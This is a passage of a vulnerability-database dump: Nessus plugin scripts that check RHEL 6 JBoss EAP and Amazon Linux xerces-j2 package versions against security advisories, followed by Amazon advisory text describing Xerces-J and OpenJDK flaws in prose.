value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-ear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-ejb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting3-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:weld-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xjc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1818\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.7.12-1.SP1_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-xjc-utils-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-boolean-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-dv-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-ts-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-core-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-entitymanager-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-envers-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-infinispan-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-impl-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-spi-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-impl-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-deployers-common-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-jdbc-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-spec-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-validator-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"javassist-eap6-3.18.1-5.GA_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-appclient-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cli-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-client-all-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-clustering-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cmp-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-configadmin-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-connector-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-console-2.2.11-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-client-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-core-security-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-repository-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-scanner-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-http-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-management-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-deployment-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ejb3-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-embedded-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-host-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jacorb-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxr-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxrs-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jdr-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jmx-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jpa-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsf-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsr77-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-logging-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-mail-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-management-client-content-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-messaging-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-modcluster-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-naming-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-network-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-configadmin-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-service-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-picketlink-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-platform-mbean-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-pojo-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-process-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-protocol-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-remoting-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-sar-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-security-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-server-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-system-jmx-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-threads-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-transactions-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-version-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-web-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-webservices-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-weld-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-xts-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-hal-2.2.11-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.5.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-appclient-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-common-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-ear-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-ejb-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-web-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting3-jmx-1.1.3-1.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-xnio-base-3.0.11-1.GA_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-appclient-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-bundles-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-core-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-domain-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-javadocs-7.4.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-modules-eap-7.4.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-product-eap-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-standalone-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-welcome-content-eap-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-common-2.3.1-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-cxf-4.3.1-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"netty-3.6.10-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-bindings-2.5.3-11.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.5.3-12.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-2.3.8-10.SP3_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"weld-core-1.1.25-1.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"wss4j-1.6.16-1.redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-eap6-2.9.1-17.redhat_6.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xjc-utils-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.7-2.redhat_1.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-cxf / apache-cxf-xjc-utils / cxf-xjc-boolean / cxf-xjc-dv / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T06:39:00", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU.", "modified": "2019-12-02T00:00:00", "id": "ALA_ALAS-2014-436.NASL", "href": "https://www.tenable.com/plugins/nessus/78779", "published": "2014-11-03T00:00:00", "title": "Amazon Linux AMI : xerces-j2 (ALAS-2014-436)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-436.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78779);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"ALAS\", value:\"2014-436\");\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"Amazon Linux AMI : xerces-j2 (ALAS-2014-436)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-436.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update xerces-j2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-demo-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-scripts-2.7.1-12.7.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-demo / xerces-j2-javadoc-apis / etc\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:34", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA resource consumption issue was found in the way Xerces-J handled XML declarations. A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.\n\n \n**Affected Packages:** \n\n\nxerces-j2\n\n \n**Issue Correction:** \nRun _yum update xerces-j2_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-demo-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-scripts-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1.noarch \n \n src: \n xerces-j2-2.7.1-12.7.19.amzn1.src \n \n \n", "modified": "2014-11-01T14:05:00", "published": "2014-11-01T14:05:00", "id": "ALAS-2014-436", "href": "https://alas.aws.amazon.com/ALAS-2014-436.html", "title": "Medium: xerces-j2", "type": "amazon", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T17:22:35", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. ([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 